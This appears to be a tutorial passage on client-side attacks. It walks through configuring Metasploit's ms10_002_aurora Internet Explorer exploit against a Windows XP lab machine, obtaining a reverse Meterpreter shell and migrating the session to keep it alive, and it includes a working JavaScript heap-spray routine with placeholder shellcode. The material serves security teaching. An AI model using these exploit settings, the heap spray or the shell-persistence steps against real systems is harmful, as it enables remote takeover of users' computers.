
Exploitation Using Client-Side Attacks


msf exploit(ms10_002_aurora) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms10_002_aurora) > set URIPATH /
URIPATH => /
msf exploit(ms10_002_aurora) > set LPORT 443
LPORT => 443
msf exploit(ms10_002_aurora) > exploit -z
[*] Exploit running as background job.
msf exploit(ms10_002_aurora) >
[*] Started reverse handler on
[*] Using URL:
[*] Local IP:
[*] Server started.

msf exploit(ms10_002_aurora) >

First, notice that the default setting for SRVHOST is 0.0.0.0. This means 
that the web server will bind to all interfaces, so make sure the attacking 
machine is reachable from the target on the port you choose. SRVPORT, 8080 by 
default, is the port to which the targeted user needs to connect for the 
exploit to trigger. We will be using port 80 instead of 8080, however; on 
Linux, binding a port below 1024 requires root (or CAP_NET_BIND_SERVICE), so 
start msfconsole accordingly. We could also set up the server for SSL, but 
for this example, we'll stick with standard HTTP. URIPATH is the path the 
user will need to request to trigger the vulnerability, and we set this to a 
slash (/) so that the bare IP address or hostname is enough. LPORT is the 
port on which the payload's reverse handler listens on the attacking machine; 
443 is chosen because outbound connections to that port are rarely blocked 
by egress filtering.

With our settings defined, open Internet Explorer on your Windows XP virtual 
machine and browse to http://<attacker's IP address>/. You'll notice the 
machine becomes a bit sluggish. After a little waiting, you should see a 
Meterpreter shell. In the background, the heap spray was performed and the 
jump into the sprayed dynamic memory was executed, with the NOP sled 
eventually carrying execution into your shellcode. If you open Task Manager 
in Windows before you run this exploit, you can actually see the memory for 
iexplore.exe growing significantly as the spray allocates block after block 
on the heap.

msf exploit(ms10_002_aurora) >
[*] Sending Internet Explorer "Aurora" Memory Corruption to client
[*] Sending stage (748032 bytes)
[*] Meterpreter session 1 opened ( ->

msf exploit(ms10_002_aurora) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >
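The heap spray described above is the part of the exploit that makes the memory of iexplore.exe balloon. The following JavaScript is an added example, not code from the page or from the Metasploit module: it builds a classic spray (a long sled of 0x0c bytes followed by a payload, grown by string doubling) and then models the resulting layout to show why a corrupted pointer only needs to land somewhere inside the sprayed region. Everything numeric is an assumption constructed for the example: 1 MB blocks, 0x24 bytes of per-allocation overhead, 0x0c0c0c0c as the hijacked address, 0x0a000000 as the address of the first block, and a four-character placeholder standing in for shellcode.

```javascript
// Added example: JavaScript heap spray plus a layout model. Not the page's
// or the Aurora module's code; all constants below are assumptions.

const BLOCK_BYTES = 0x100000;   // 1 MB per sprayed string (assumption)
const HEADER_BYTES = 0x24;      // assumed per-allocation overhead, so blocks stay 1 MB apart
const SLED_CHAR = "\u0c0c";     // two 0x0c bytes: a harmless instruction AND a pointer into the spray
const SPRAY_BASE = 0x0a000000;  // assumed address of the first sprayed block
const TARGET_ADDR = 0x0c0c0c0c; // the value the corrupted pointer ends up holding (assumption)

// Placeholder payload: four constructed UTF-16 code units, NOT real shellcode.
const FAKE_SHELLCODE = "\u4141\u4242\u4343\u4444";

// Build one spray block: a long sled of SLED_CHAR followed by the payload.
// JavaScript strings are UTF-16, so each character occupies two bytes in
// memory (the same property IE-era sprays relied on via unescape("%u0c0c")).
function buildSprayBlock(shellcode, blockBytes = BLOCK_BYTES) {
  const sledChars = (blockBytes - HEADER_BYTES) / 2 - shellcode.length;
  let sled = SLED_CHAR;
  while (sled.length < sledChars) sled += sled;   // exponential doubling keeps this fast
  sled = sled.substring(0, sledChars);
  return sled + shellcode;
}

// Allocate `count` copies of the block. In old IE, substring() produced a
// fresh heap copy each time, which is what pushed the process's memory up
// steadily; modern engines may share storage, so the model below tracks
// layout rather than real addresses.
function spray(block, count) {
  const blocks = [];
  for (let i = 0; i < count; i++) {
    blocks.push(block.substring(0, block.length));
  }
  return blocks;
}

// Model the heap as the blocks placed back to back from `base` and report
// what sits at `addr`: sled, payload, a block header, or nothing mapped.
function whatIsAt(blocks, shellcodeLen, addr, base = SPRAY_BASE, blockBytes = BLOCK_BYTES) {
  const off = addr - base;
  if (off < 0 || off >= blocks.length * blockBytes) return { region: "unmapped" };
  const index = Math.floor(off / blockBytes);
  const inBlock = off % blockBytes;
  if (inBlock < HEADER_BYTES) return { region: "header", block: index };
  const charIdx = Math.floor((inBlock - HEADER_BYTES) / 2);
  const sledChars = blocks[index].length - shellcodeLen;
  if (charIdx < sledChars) {
    // Execution slides through the remaining sled characters into the payload.
    return { region: "sled", block: index, charsToShellcode: sledChars - charIdx };
  }
  return { region: "shellcode", block: index, charsIntoShellcode: charIdx - sledChars };
}

// How many blocks must be sprayed before `addr` is covered at all.
function blocksToReach(addr, base = SPRAY_BASE, blockBytes = BLOCK_BYTES) {
  return Math.floor((addr - base) / blockBytes) + 1;
}

// Spray `count` blocks and report where the hijacked address would land.
function demo(count = 40) {
  const block = buildSprayBlock(FAKE_SHELLCODE);
  const heap = spray(block, count);
  return {
    blockChars: block.length,
    landing: whatIsAt(heap, FAKE_SHELLCODE.length, TARGET_ADDR),
    needed: blocksToReach(TARGET_ADDR),
  };
}

console.log(JSON.stringify(demo(40)));
```

Run it with node. With 40 blocks the model reports the target address inside the sled of block 32, well short of the payload, which is exactly why the exact landing spot does not matter; with only 10 blocks the same address is unmapped, which is why sprays are sized generously and why the browser feels sluggish while the spray runs.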

You now have a Meterpreter shell, but there's a slight problem. What if 
the targeted user closes the browser because her computer has become 
sluggish? You would lose your session to the target: the exploit succeeded, 
but the session would be cut off prematurely. Fortunately, there is a way 
around this: type run migrate as soon as the connection is established, and 
hope that you make it in time. This Meterpreter script migrates the session 
into the memory space of a separate process, improving the chances of keeping 
your shell open if the targeted user closes the originally exploited process. 
Because this is a race against the user, a more reliable approach is to set 
the exploit's AutoRunScript advanced option before launching it (for example, 
set AutoRunScript post/windows/manage/migrate), so that the migration runs 
automatically the moment each session opens.